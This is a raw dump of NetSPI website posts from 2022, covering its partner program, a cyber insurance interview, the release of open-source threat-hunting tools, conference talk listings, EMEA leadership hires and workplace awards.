Channel partners: NetSPI provides its full suite of security services and products through a global channel network of referral and reseller partners. To meet partners’ requirements, the programs include a tier-based model consisting of referral fees, preferred client pricing and reseller discounts.
Technology partners: Security and third-party software companies help build integrations with NetSPI to improve overall customer experiences.
For both, NetSPI offers technical and sales support to help partners achieve their business and GTM goals.
[post_title] => Channel Futures: NetSPI Unleashes New Partner Program
[post_excerpt] => On August 19, NetSPI was featured in Channel Futures' article NetSPI Unleashes New Partner Program.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => channel-futures-netspi-unleashes-new-partner-program
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:19
[post_modified_gmt] => 2023-01-23 21:10:19
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28282
[menu_order] => 96
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[27] => WP_Post Object
(
[ID] => 28256
[post_author] => 91
[post_date] => 2022-08-17 15:35:00
[post_date_gmt] => 2022-08-17 20:35:00
[post_content] =>
On August 17, NetSPI was featured in Channel Marketer Report's With Experienced Channel Leader On Board, NetSPI Launches First Formal Partner Program. Read the preview below or view it online.
+++
NetSPI, an enterprise penetration testing and attack surface management solution provider, has launched its first formalized program to support its global channel and technology partners.
Partners within the program can offer end users NetSPI’s vulnerability management technologies and human-delivered offensive security services, allowing both the partner and NetSPI to expand product and service offerings, further develop customer relationships, and enter new markets.
The program is led by Lauren Gimmillaro, NetSPI’s Vice President of Business Development and Strategic Alliances. Gimmillaro has a track record of launching four successful partner programs, consisting of working with channel, referral, reseller, and technology partners.
The NetSPI Partner Program provides its referral and reseller partners with the company’s full suite of security services and products. To meet partners’ requirements, the programs include a tier-based model consisting of referral fees, preferred client pricing, and reseller discounts, the company said in a press release.
“NetSPI offers free unlimited technical and business training to ensure our partners feel comfortable speaking to NetSPI’s products and services,” Gimmillaro told CMR. “Additionally, we will support our partners with a variety of go-to-market initiatives, which include featuring partners on our blog, LinkedIn announcements, joint one-pagers, co-hosted events and webinars, and more.”
[post_title] => Channel Marketer Report: With Experienced Channel Leader On Board, NetSPI Launches First Formal Partner Program
[post_excerpt] => NetSPI's was featured in Channel Marketer Report's article highlighting the launch of our formal Partner Program, led by Lauren Gimmillaro.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => channel-marketer-report-netspi-launches-first-formal-partner-program
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:20
[post_modified_gmt] => 2023-01-23 21:10:20
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28256
[menu_order] => 98
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[28] => WP_Post Object
(
[ID] => 28239
[post_author] => 91
[post_date] => 2022-08-17 08:30:00
[post_date_gmt] => 2022-08-17 13:30:00
[post_content] =>
NetSPI Partner Program equips channel and technology partners with pentesting tools, services, and talent, bolstering security worldwide.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the launch of the NetSPI Partner Program which empowers its global channel and technology partners to deliver offensive security services during a time when it’s needed most.
Partners within the program can offer end users NetSPI’s proven vulnerability management technologies and human-delivered offensive security services, allowing both the partner and NetSPI to expand product and service offerings, further develop customer relationships, and enter new markets. Additionally, last month NetSPI joined the AWS Marketplace, simplifying the procurement process for enterprise organizations with existing AWS relationships by allowing them to purchase NetSPI’s offerings directly via the marketplace.
The program is led by NetSPI’s Vice President of Business Development and Strategic Alliances, Lauren Gimmillaro. Gimmillaro has a track record of launching four successful partner programs, consisting of working with channel, referral, reseller, and technology partners.
“As today’s global attack surface evolves and cybercriminals become more sophisticated in nature, it’s critical to provide end users with the tools, services, and skill sets they need to take an offensive approach to security," said Gimmillaro. “Centered around our customer-first approach, the NetSPI Partner Program will allow our team to extend our world-class pentesting capabilities to a variety of diverse and trusted partners, strengthening organizations’ cyber security efforts across the globe.”
The NetSPI Partner Program encompasses the following partnership types:
Channel Partners: NetSPI provides its full suite of security services and products through a global channel network of referral and reseller partners. To meet partners' requirements, the programs include a tier-based model consisting of referral fees, preferred client pricing, and reseller discounts.
Technology Partners: Security and third-party software companies help build meaningful integrations with NetSPI to improve overall customer experiences.
For both, NetSPI offers technical and sales support to help partners achieve their business and go-to-market goals.
"Through the NetSPI Partner Program, SecureLink has been able to provide enterprises in the Middle East and Africa region access to NetSPI's continuous and scalable suite of offensive security solutions,” said Manish Pardeshi, director of cybersecurity practices at SecureLink. “With NetSPI, we are proud to offer unmatched sophistication, methodology, and value to our global customer base."
“Apiiro is proud to be part of the NetSPI Partner Program. The partnership has provided our customers with next-gen, context aware pentesting capabilities and NetSPI customers with our ability to detect and fix critical risks in cloud-native applications,” said John Leon, vice president of business development at Apiiro. “Being a member of the NetSPI Partner Program allows us to achieve our sales goals while providing mutual customers with industry leading services and expertise.”
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
The average cost of a data breach in 2021 was $4.35 million.
The average cost of a ransomware attack, not including the cost of the ransom was $4.54 million in 2021.
60 percent of organizations’ breaches led to increases in prices passed on to customers.
Given the significant costs associated with data breaches, organizations are increasingly looking to cyber insurance to help protect their businesses against financial losses from a cyber attack. In fact, in IBM’s report, “insurance protection” was a key factor that lowered the average total cost of a data breach.
Yet, cybersecurity insurance is still considered an emerging space, one that is notoriously difficult to navigate.
For insights on the topic, we recently sat down with industry experts Ethan Harrington, Founder and Principal at 221b Consulting, and Mary Roop, Consultant at 221b Consulting, to discuss the current state of cyber insurance and get answers to some of our burning questions. Continue reading for highlights from the discussion.
What’s going on in the cyber insurance market?
Ethan Harrington: The market is terrible, and many of the issues we've started to experience have surfaced just within the last few years. Last year was a historical year, and not for good reason. We saw a 300-plus percent increase in ransomware. We also saw our clients experience triple-digit increases in their cyber insurance premiums.
On average, a company categorized as having "good" risk levels may see a 15 to 20 percent increase in premiums, and those at the "questionable" risk level or that have had claims experience may see another three-digit percentage increase.
Why is this happening? Market corrections. The insurance marketplace is global, and all of these insurers are writing more than cyber coverage. When they have a year where auto liability coverage is bad, they're typically going to try to make up some of that premium in other places because they have to make money. In 2019 and during COVID-19, auto liability and general liability were extremely stressed, along with other claims completely unrelated to cyber. So, we knew that there was going to be a potential correction.
But what we saw last year was a complete market shift. We’ve never seen anything like this before. We’re concerned that what we’re seeing right now is going to perpetuate for many more years and are unsure if coverages are ever going to return to what they were and how the associated premium will be impacted.
As cyber insurance matures, is it becoming yet another regulation or standard to comply with?
Ethan: Yes and no. Yes, because it is another party that is keenly interested in what organizations are doing to not only harden their defenses and protect their financials but also protect Personally Identifiable Information (PII) or data from a potential ransomware attack that could cause business interruption.
Insurers are starting to layer on more requirements beyond what NIST or ISO would indicate as guidance – and they’re asking questions specific to CISOs. They're starting to ask questions about cyber resiliency. In general, most regulatory frameworks that organizations follow focus on preventative actions. Now, carriers are focusing on reactive responses to cyber attacks, looking at what you are doing to limit the potential impact if you do have to file a claim.
There’s more scrutiny involved in cyber insurance today, and it's different from what other regulators require.
Who typically manages the cyber insurance process?
According to the webinar attendees, here is the breakdown of how cyber insurance is managed at their respective organizations, many of which came from financial institutions:
42% risk management
25% finance
25% information security
8% general counsel/legal
Mary Roop: Whoever runs risk management typically controls the placement, but it truly is a partnership between the person responsible for placing the insurance policies, the information security team, the privacy team within legal, and the team responsible for Payment Card Insurance (PCI) compliance.
These teams need to work together to ensure an understanding of the cyber hygiene and the data incident response within your organization. This creates a holistic picture with complete information useful in the robust cyber insurance application and underwriting process.
How has ransomware played a role in the cyber insurance market?
Ethan: Ransomware decimated the entire insurance industry from a cyber perspective. In 2021, there was a 300-plus percent increase in ransomware attacks. Ransomware used to be a quick way for adversaries to grab cash, but they've become more intelligent, conducting background checks into businesses to determine what their financials look like to identify the most realistic ransom amount to ask for.
Ransomware is not going away anytime soon, and the cyber insurance market is responding to that. Now, we are starting to see sub-limits within insurance policies specific to ransomware, separate retentions as it applies to ransomware, and different changes in waiting periods (eight hours then vs. 24-48 hours now). But I expect that'll start to lessen, and some of those policies will return to what they were before.
How have cybersecurity insurance questionnaires evolved?
Ethan: 15 years ago, none of the insurers had any expertise in cybersecurity. Many insurance companies recognized that they do not understand cybersecurity and hired third parties to come in and ask the questions on their behalf.
That has changed. Lots of insurance carriers are now hiring specific technical people that have been consultants in cyberspace or those who managed security service providers because they understand the market much better. Now, insurance companies are teaching them insurance and how to do underwriting versus outsourcing.
How do you navigate situations where providers require specific vendors for your solutions and controls?
Mary: If your cyber insurance carrier isn't already requesting this within the application, we do recommend getting pre-approval on your data incident providers. They may be included on that pre-approved list already, and if not, they're going to have to be vetted extensively by those providers.
This process is lengthy, but it is important to undertake before starting your renewal strategy. Go meet up with your legal team to determine the outside counsel that you can use to help advocate for your vendor choices. Carriers want to understand vendor credibility if they're not familiar with them.
Getting ahead of this process is important because you don't want any surprises when a data incident occurs. Like when your carrier says, "We're not going to approve this claim because you do not use an approved vendor." If you are proactive about this, you can go to the leaders of the respective departments and come up with a solution before it's too late.
There has been talk about possibly monitoring clients’ cyber behavior and adjusting insurance premiums accordingly. How might we see a program like this play out?
Ethan: We don’t like insurance companies constantly monitoring and doing scans of environments. It looks bad for the insurance industry because we all know that there's going to be weaknesses that can be found if you look close enough.
If an insurance company is constantly scanning your system, it is possible that they're going to come back to you and say, “We need you to fix this.” At some point, the CISO is going to say, “I don't have any more risk management practices that I can apply to protect us against that.” Security teams can do everything they can, but if employees/personnel make a negligent mistake or are heavily targeted, they can cause a massive claim to occur.
We’re putting the CISO in a difficult position where they’re trying to manage the board, protect their critical assets, and now all of a sudden, they also need to keep an insurance company happy.
Some scans delve into the depths of systems to find vendors and clients that you've referenced and how they could affect your insurance. Underwriters, especially in financial services, are looking at the kind of brand reputation or loss of business income that might be impacted if there was a data security incident. It's becoming exceedingly difficult for underwriters to try to figure this out.
Have you seen any companies go under because they've failed to secure cyber insurance due to poor IT security controls?
Ethan: Thus far, no, I have not seen anybody that has actually gone under because they didn't buy cyber insurance. But I anticipate it is going to happen, especially with the triple-digit increases in premiums.
We are seeing more and more companies that are not buying or cannot obtain cyber insurance, and it will come back to bite them in some capacity. It's likely that we will see organizations going under as a result of the rising financial costs associated with breaches today.
For the full conversation and more in-depth insights from Ethan, Mary, and Norman, watch the on-demand webinar.
[post_title] => The Current State of Cyber Insurance
[post_excerpt] => Get answers to your cybersecurity insurance questions with industry experts Ethan Harrington and Mary Roop from 221b Consulting.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => state-of-cyber-insurance
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:23
[post_modified_gmt] => 2023-01-23 21:10:23
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28189
[menu_order] => 106
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[30] => WP_Post Object
(
[ID] => 28157
[post_author] => 91
[post_date] => 2022-08-09 09:00:00
[post_date_gmt] => 2022-08-09 14:00:00
[post_content] =>
The tools help defense teams discover vulnerable network shares and identify adversary behaviors.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today unveiled two new open-source tools for the information security community: PowerHuntShares and PowerHunt.
These new adversary simulation tools were developed by NetSPI’s Senior Director, Scott Sutherland, to help defense, identity and access management (IAM), and security operations center (SOC) teams discover vulnerable network shares and improve detections.
PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain joined computers. This capability helps address the risks of excessive share permissions in Active Directory environments that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments.
PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. PowerHunt automates the collection of artifacts at scale using PowerShell remoting and perform initial analysis. It can also output easy to consume .csv files so that additional triage and analysis can be done using other tools and processes.
“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”
NetSPI’s global penetration testing team has developed several open-source tools, including popular penetration testing tools PowerUpSQL and MicroBurst. Learn more about NetSPI’s commitment to open-source tool development on the company’s tool repository.
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over one million assets to find four million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
This Gartner’s Hype Cycle SecOps includes entries across the SecOps space that “aim to help security and risk management leaders strategize and deliver effective response and remediation.”
We believe our inclusion in this year’s report validates NetSPI’s PTaaS model.
The core benefits of NetSPI's Resolve™ platform in three core areas include:
Hybrid automated and manual testing approach: NetSPI leverages a combination of automation and human pentesters to increase the efficiency and effectiveness of the results. With automation, NetSPI alleviates many of the mundane vulnerability management tasks for organizations—enabling more manual pentesting to find and fix business-critical vulnerabilities.
Real-time validation and faster remediation: NetSPI’s PTaaS model delivers a platform that enables faster scheduling and execution, and real-time communications with testers and visibility of test results. By providing access to real-time findings, NetSPI enables earlier remediation of vulnerabilities.
Support for teams with limited in-house security experts: NetSPI provides customized and tailored guidance throughout the life cycle of each assessment to support internal teams facing the pressures of the security skill gap.
“To us, this acknowledgment by Gartner further cements our approach to delivering innovative vulnerability and risk management solutions to today’s top enterprises,” said Travis Hoyt, CTO at NetSPI. “Traditional penetration testing is dead. PTaaS allows organizations to remediate faster, receive support from expert pentesters, and implement a strategic approach to offensive security.”
According to Gartner, “the adoption of remote work, and increased use of mobile devices and cloud services have not slowed over the last 12 months. This has led to expanded requirements for organizations to track risk and threats to a wider set of digital assets. With the expansion of digital business functions and third-party-managed assets, security and risk management leaders must reevaluate how their business-critical environments change security strategy and tooling.” The report also mentions that “pentesting is foundational in a security program and mandated by various compliance standards. PTaaS enables organizations to elevate their security posture through continual assessment, and integrates validation earlier in the AppDev cycle by giving access to real-time findings delivered through the platform, therefore enabling faster treatment of vulnerabilities.”
Gartner, Hype Cycle for Security Operations, 2022, Andrew Davies, 5 July, 2022.
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. GARTNER and HYPE CYCLE are the registered trademarks of Gartner Inc., and/or its affiliates in the U.S and/or internationally and have been used herein with permission. All rights reserved.
About NetSPI
NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Recognized in the 2022 Gartner® Hype Cycle™ for Security Operations
[post_excerpt] => Learn why NetSPI was recognized by Gartner for its innovations in Penetration Testing as a Service (PTaaS).
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => gartner-hype-cycle-security-operations-2022
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:25
[post_modified_gmt] => 2023-01-23 21:10:25
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28162
[menu_order] => 110
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[32] => WP_Post Object
(
[ID] => 28141
[post_author] => 91
[post_date] => 2022-08-03 10:01:48
[post_date_gmt] => 2022-08-03 15:01:48
[post_content] =>
Penetration Testing as a Service (PTaaS) leader marks its presence with various speaking sessions, open source tool releases, and a happy hour event during this year’s Black Hat and DEF CON conferences.
Minneapolis, MN and Las Vegas – NetSPI, the leader in enterprise security testing and attack surface management, will be participating in several speaking sessions and activities during Black Hat 2022 and DEF CON, taking place at the Mandalay Bay Expo Hall in Las Vegas starting on August 30. NetSPI is located at Booth #1687 on the Mandalay Bay Trade Floor.
With over 20 years of experience, NetSPI’s team of over 200 global pentesters are highly-skilled in manual pentesting and laser-focused on excellence. During the events, these company experts will inform attendees on the vulnerabilities and escalating threats targeting enterprises, as well as share insights on how businesses can mature their security programs and empower their workforces.
NetSPI speaking sessions during Black Hat and DEF CON include:
On August 10 at 10:20am PT, Nick Landers, Director of Research at NetSPI, will present at Black Hat alongside James Forshaw, Security Researcher at Google Project Zero, in a talk titled: “Elevating Kerberos to the Next Level.” In this talk, Nick and James will conduct a deep dive into the inner workings of Kerberos as it applies to local authentication and some of the unusual behaviors to be found within. They will also describe the Kerberos security issues they’ve discovered, including authentication bypasses, sandbox escapes and arbitrary code execution in privileged processes.
On August 12 at 10:10am PT, Karl Fosaaen, Senior Director at NetSPI, will present at the DEF CON Cloud Village in a talk titled: “Automating Insecurity in Azure.” In this talk, Karl will go over how Automation Accounts function within Azure, how attackers can abuse built-in functionality to gain access to credentials, privileged identities, and sensitive information, and present a deep dive on four vulnerabilities from the last year that all apply to Azure Automation Accounts.
On August 12 and 13, Melissa Miller, Managing Security Consultant at NetSPI will present at the DEF CON Girls Hack Village.
On August 12 at 5pm PT Imposter Syndrome: The Silent Killer of Motivation, Melissa will discuss the characteristics of a healthy work environment and steps towards updating your environment to make it right for you, along with—how to realistically identify your strengths and weaknesses and use that information to pursue and achieve your career goals.
On August 13 at 1:30pm PT at the Hacking Diversity panel, Melissa will discuss how the industry can increase diversity in cybersecurity.
During Black Hat, Scott Sutherland, Senior Director at NetSPI, will be revealing two new open source tools for security operations centers. The new tools are designed to help teams hunt for artifacts and anomalies associated with common “known bad” behaviors, and help teams inventory, naturally group, and prioritize the triage/remediation of excessive privileges assigned to SMB shares hosted across Active Directory computers.
For more information or to book a meeting with one of NetSPI’s experts at Black Hat or DEF CON, please click here.
You can also join NetSPI for their Black Hat happy hour co-hosted by Adaptive Shield, and Armis on August 10 at 5 PM PT at the Foundation Room Las Vegas, located on the 63rd floor of Mandalay Bay. Register your spot today.
About NetSPI
NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => Media Alert: NetSPI at Black Hat 2022 and DEF CON 30
[post_excerpt] => Connect with NetSPI’s expert offensive security team during Black Hat 2022 and DEF CON 30 during their speaking sessions, happy hour, or at the NetSPI booth.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => black-hat-2022-def-con-30
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:25
[post_modified_gmt] => 2023-01-23 21:10:25
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28141
[menu_order] => 111
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[33] => WP_Post Object
(
[ID] => 27963
[post_author] => 91
[post_date] => 2022-06-21 03:00:00
[post_date_gmt] => 2022-06-21 08:00:00
[post_content] =>
Security industry leaders join NetSPI’s EMEA team to fuel growth and meet increased demand for pentesting services in EMEA.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the expansion of its global footprint in Europe, Middle East, and Africa (EMEA) to meet growing international demand for its offensive security solutions.
“NetSPI’s technology-powered services and customer-first focus has solidified the company’s leading position within the North American offensive security industry,” said KKR’s Paul Harragan, a London-based investor in NetSPI. “The team’s specialised skill set, tech acumen and white glove delivery model will resonate with the European market and should drive continued growth and expansion as the team develops and delivers critical offensive security solutions.”
“We’ve experienced a record volume of demand from EMEA organisations needing to improve their security posture through a proven, holistic approach to pentesting, and now, we’re well positioned to deliver this in the region,” said Aaron Shilts, CEO, NetSPI. “We’ve hired a team of extremely talented, energising security leaders who align with our customer-first approach to business. Establishing our EMEA beachhead with this incredible group will ensure NetSPI is destined for accelerated growth and continued success in the region.”
The company has appointed security industry veterans Steve Bakewell, Steve Armstrong, and Eric Graves to strategically lead NetSPI’s EMEA team and drive further growth in the region. Bakewell joins NetSPI as Managing Director of EMEA and brings over 23 years of experience in cybersecurity and risk management across organisations including Central Government & Defence and Royal Bank of Scotland, as well as with security vendors such as CipherCloud, RiskIQ and Citrix.
“The pentesting space is highly competitive in the UK, but vendors in the region simply do not have the pedigree that NetSPI has,” Bakewell said. “NetSPI already provides its penetration testing services to nine out of the top 10 U.S. banks and many of the Fortune 500 – I’m looking forward to the opportunity to serve end users in EMEA during a time when security is high on the business agenda.”
Bakewell will work closely with Armstrong, who has been appointed Regional Vice President for EMEA. Armstrong has two decades of experience in sales and security, spanning companies including Bitglass, CyCognito and Avira. Graves will work alongside Armstrong as NetSPI’s Regional Sales Director for EMEA, leveraging his extensive experience in cybersecurity sales for organisations such as Pentera, TrendMicro and Spok, to meet global demand and provide NetSPI’s award-winning pentesting solutions to EMEA customers. The three leaders will work closely alongside Shilts and oversee NetSPI’s growing team in EMEA.
NetSPI will be at InfoSecurity Europe from June 21-23, 2022 at ExCel London. Participate in a live demo and meet the company’s security experts at Stand M-12. For more information or to schedule a meeting with NetSPI at InfoSecurity Europe, please click here.
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Expands Global Footprint with Strategic Leadership Appointments in EMEA
[post_excerpt] => Read about NetSPI’s expansion into the EMEA region to meet increased demand for strategic penetration testing services.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-emea-expansion
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:30
[post_modified_gmt] => 2023-01-23 21:10:30
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27963
[menu_order] => 124
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[34] => WP_Post Object
(
[ID] => 27956
[post_author] => 91
[post_date] => 2022-06-17 15:01:02
[post_date_gmt] => 2022-06-17 20:01:02
[post_content] =>
The company is recognized for its innovation, culture, and leadership by The Star Tribune and the Top Workplaces Program.
Minneapolis, MN – NetSPI, the leader in penetration testing and attack surface management, recently won two Top Workplaces awards – Top 200 Workplaces in Minnesota and the Cultural Excellence Awards – recognizing the company’s forward-looking innovation, team-first culture, and dedicated leadership team.
Top Workplaces recognizes the most progressive companies in Minnesota based on employee opinions, measuring engagement, organizational health, and satisfaction, and the Cultural Excellence Awards highlight the company’s advancement in three key areas:
Innovation: Celebrates organizations who have embedded innovation into their culture and create an environment where new ideas come from all employees.
Purpose & Values: Celebrates organizations who have both embedded their mission and values into their culture and are efficient in their work to bring it into reality.
Leadership: Celebrates organizations whose leaders inspire confidence in their employees and in the direction of the company.
“We prioritize fostering an environment that ensures every team member feels valued, heard, and supported,” said Heather Crosley, Director of People Operations at NetSPI. “These two recognitions prove that our dedication to our culture is resonating across our workforce, and I want to thank our team for making NetSPI a great place to work.”
These recognitions come during a year of rapid growth and innovation for NetSPI, as the company brought on more than 90 new employees this year already. NetSPI’s strong recruiting and retention initiatives and flexible company culture drive the development of new mission-critical services, with the company recently announcing the launch of its new attack surface management service, as well as enhancements to its breach & attack simulation offering. NetSPI is also expanding its global presence, building on its current momentum to serve the EMEA region.
“Retaining top talent is more important than ever in today’s evolving cybersecurity threat environment,” said Aaron Shilts, CEO of NetSPI. “Our workforce consistently exceeds expectations, and our team-first culture is a driving force of that success. We are honored to be recognized by the Star Tribune and Top Workplaces.”
The results of the Star Tribune Top Workplaces are based on survey information collected by Energage, an independent company specializing in employee engagement and retention. The analysis includes responses from employees at Minnesota public, private, and nonprofit organizations. Earlier this year, NetSPI was recognized as a 2022 National Top Workplace.
NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Named a Top Minnesota Workplace and Honored for its Cultural Excellence
[post_excerpt] => Learn what makes NetSPI a Top Workplace in Minnesota and a leader in cultural excellence.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => top-200-minnesota-workplaces
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:32
[post_modified_gmt] => 2023-01-23 21:10:32
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27956
[menu_order] => 127
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[35] => WP_Post Object
(
[ID] => 27877
[post_author] => 91
[post_date] => 2022-06-07 08:00:00
[post_date_gmt] => 2022-06-07 13:00:00
[post_content] =>
The RSA Conference is one of the largest cybersecurity events in the world, offering a multitude of opportunities for members of the cybersecurity community to gain valuable insights and network with one another. And this week, the NetSPI team packed their bags and flew out to San Francisco for the conference after a two-year hiatus.
What are you looking forward to most during the 2022 RSA Conference?
What does NetSPI’s recognition as “Most Innovative in Penetration Testing” mean to you and what do you think makes NetSPI the most innovative pentesting company?
Continue reading for responses from our product, services, and sales leadership – all of which were clearly excited to see many of our clients and customers in-person.
What are you looking forward to most during the 2022 RSA Conference?
Cody Chamberlain, Head of Product
“The security community isn’t very large and bringing everyone together is extremely valuable. This is an opportunity for connecting, sharing stories, and further building relationships across companies.
Talking with clients and prospects about the NetSPI story is the most exciting thing for me. We are in a unique position in the market with our combination of industry-leading talent and technology and I’m excited to share that with people at the conference, especially those unaware of us.”
Charles Horton, Chief Operating Officer
“The RSA Conference has always had an impressive lineup of speakers and sessions. Having a hiatus like many conferences have had, I think there will be a tremendous amount of energy coming into the conference as people are eager to collaborate in person with clients, colleagues, and vendors. As the landscape continues to move and shift, and clients go through different investment levels and cycles of their security programs, it is an opportune time to evaluate who and where they are investing their dollars given the number of sponsor organizations at the event.”
Chad Peterson, Managing Director
“I am most excited about getting the opportunity to speak with our clients and industry face-to-face again. Any time we have the chance to interact in person, it always seems to foster great conversations and thought leadership.
Having a group of experts throughout the industry under one roof again allows us to exchange ideas on how to better the security community and holistically help our shared client base.”
Robert Richardson, VP of Enterprise Sales
“The opportunity to connect face-to-face and spend time with our clients and meet new people is what I’m most excited about. It’s been too long. I’m really glad the turnout is exponentially larger than 2020.”
Alex Jones, Chief Revenue Officer
“I’m absolutely most excited about seeing all of our amazing customers. It has been such a long time since our last in-person RSA conference and the event presents such a great opportunity to connect with a high volume of people in such a short time. A huge plus is that we get to enjoy seeing our customers while also doing a lot of events with our NetSPI team.
From a presentation perspective, I am most intrigued about Bruce Schneier’s keynote, ‘What Matters Most.’ There is so much change occurring at such a rapid pace within our industry that we need to challenge conventional thinking and start trying to solve problems in a different way.”
Nabil Hannan, Managing Director
“With the RSA conference being an in-person event this year, I’m most excited to re-connect with people in the industry in person. After two plus years of the pandemic, it’ll be really nice to re-connect with colleagues and catch up in person and learn from them about their current areas of focus, challenges, and the industry trends that they’re observing.”
What does NetSPI’s recognition as most innovative in pentesting mean to you and what do you think makes NetSPI the most innovative pentesting company?
Cody Chamberlain, Head of Product
“It means we’re getting third-party validation of what we already know – that we have the best talent in the industry and the investments we’ve made into our technology are meeting the market’s need of high-touch customer service. As a result, we’re able to identify more vulnerabilities of a higher severity for our clients.
Our people make NetSPI the most innovative pentesting company. As the person who works everyday building and executing a technology roadmap, that might sound counter intuitive, but I see my job as finding the best ways to scale and maximize the effectiveness of our humans. At the end of the day, humans are the key to our success!”
Charles Horton, Chief Operating Officer
